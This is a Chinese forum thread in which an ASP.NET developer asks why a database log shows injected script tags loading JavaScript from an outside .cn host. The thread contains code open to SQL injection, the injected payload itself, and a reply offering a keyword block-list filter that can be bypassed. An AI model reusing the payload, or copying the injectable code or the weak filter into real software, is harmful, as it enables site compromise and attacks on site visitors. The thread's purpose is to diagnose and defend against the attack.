我的源码: #region 使用一条Sql得到一个数据表
/// <summary>
/// 从一条SQL语句返回一个数据表
/// </summary>
/// <param name="sql"></param>
/// <returns></returns>
public static System.Data.DataTable GetDtFromSql(string sql)
{
System.Data.DataTable dt = null;
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand();
command.Connection = GetSqlConn();
command.CommandText = sql;
System.Data.SqlClient.SqlDataAdapter adapter = new System.Data.SqlClient.SqlDataAdapter();
adapter.SelectCommand = command;
System.Data.DataSet ds = new DataSet();
try
{
command.Connection.Open();
string sql1=sql;
sql = sql.Replace("'", "\"");
command.CommandText = string.Format("insert into lljl(llsj,sqltxt) values(getdate(),'{0}')", sql);
command.ExecuteNonQuery();
if (sql.IndexOf("script") == -1)
{
command.CommandText = sql1;
adapter.Fill(ds);
}
command.Connection.Close();
dt = ds.Tables[0]; }
catch
{
if (command.Connection.State == System.Data.ConnectionState.Open)
{
command.Connection.Close();
}
command.Dispose(); }
return dt;
}
#endregion
DataTable dt = Common.GetDtFromSql("select top 8 id,biaoti,leixing from yxdt where istj=1 order by fbsj desc");
数据库记录的日志:select top 8 id,biaoti,leixing from yxdt where istj=1 order by fbsj desc<script src=http://8f8el3l.cn/0.js></script><script src=http://8f8el3l.cn/0.js></script>被人挂了js脚本 请教高手解答
/// <summary>
/// 从一条SQL语句返回一个数据表
/// </summary>
/// <param name="sql"></param>
/// <returns></returns>
public static System.Data.DataTable GetDtFromSql(string sql)
{
System.Data.DataTable dt = null;
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand();
command.Connection = GetSqlConn();
command.CommandText = sql;
System.Data.SqlClient.SqlDataAdapter adapter = new System.Data.SqlClient.SqlDataAdapter();
adapter.SelectCommand = command;
System.Data.DataSet ds = new DataSet();
try
{
command.Connection.Open();
string sql1=sql;
sql = sql.Replace("'", "\"");
command.CommandText = string.Format("insert into lljl(llsj,sqltxt) values(getdate(),'{0}')", sql);
command.ExecuteNonQuery();
if (sql.IndexOf("script") == -1)
{
command.CommandText = sql1;
adapter.Fill(ds);
}
command.Connection.Close();
dt = ds.Tables[0]; }
catch
{
if (command.Connection.State == System.Data.ConnectionState.Open)
{
command.Connection.Close();
}
command.Dispose(); }
return dt;
}
#endregion
DataTable dt = Common.GetDtFromSql("select top 8 id,biaoti,leixing from yxdt where istj=1 order by fbsj desc");
数据库记录的日志:select top 8 id,biaoti,leixing from yxdt where istj=1 order by fbsj desc<script src=http://8f8el3l.cn/0.js></script><script src=http://8f8el3l.cn/0.js></script>被人挂了js脚本 请教高手解答
你的sql语句不够安全。换。
在进程找到可疑进程 可以借助工具
断开网络 杀毒删除文件。更换密码和关闭不毕业的端口
html标记要做相应的处理.
command.CommandText = string.Format("insert into lljl(llsj,sqltxt) values(getdate(),'{0}')", sql);
这一段是为了暂时的记录日志用,在网站怅发布时是没有的.
现在的问题是:运行一个简单的查询语句,可是在数据库端看到的查询语句中被加了js内容.
哎....
command.CommandText = string.Format("insert into lljl(llsj,sqltxt) values(getdate(),'{0}')", sql);
这一段是为了暂时的记录日志用,在网站怅发布时是没有的.
现在的问题是:运行一个简单的查询语句,可是在数据库端看到的查询语句中被加了js内容.
哎....
然后用存储过程,我能想到得就这么多了
或者是数据库的存储上做了什么手脚.
void Application_BeginRequest(Object sender, EventArgs e)
{
StartProcessRequest(); }
private void StartProcessRequest()
{
try
{
string getkeys = "";
string sqlErrorPage = "index.aspx";
if (System.Web.HttpContext.Current.Request.QueryString != null)
{ for (int i = 0; i < System.Web.HttpContext.Current.Request.QueryString.Count; i++)
{
getkeys = System.Web.HttpContext.Current.Request.QueryString.Keys[i];
if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.QueryString[getkeys]))
{
System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);
System.Web.HttpContext.Current.Response.End();
}
}
}
if (System.Web.HttpContext.Current.Request.Form != null)
{
for (int i = 0; i < System.Web.HttpContext.Current.Request.Form.Count; i++)
{
getkeys = System.Web.HttpContext.Current.Request.Form.Keys[i];
if (getkeys == "__VIEWSTATE") continue;
if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.Form[getkeys]))
{
System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);
System.Web.HttpContext.Current.Response.End();
}
}
}
}
catch
{ }
}
private bool ProcessSqlStr(string Str)
{
bool ReturnValue = true;
try
{
if (Str.Trim() != "")
{
string SqlStr = "exec¦insert¦select¦delete¦master¦update¦truncate¦declare";
string[] anySqlStr = SqlStr.Split('¦');
foreach (string ss in anySqlStr)
{
if(!Str.ToLower().Contains("updatepanel"))
{
if (Str.ToLower().IndexOf(ss) >= 0)
{
ReturnValue = false;
break;
}
}
}
}
}
catch
{
ReturnValue = false;
}
return ReturnValue;
}
这一句如果我一开始输入的时候注入,后面的都注释,就是把单引号改了也不好使呀,还要把“--”去掉,尽量用sqlparameter这种方式,安全。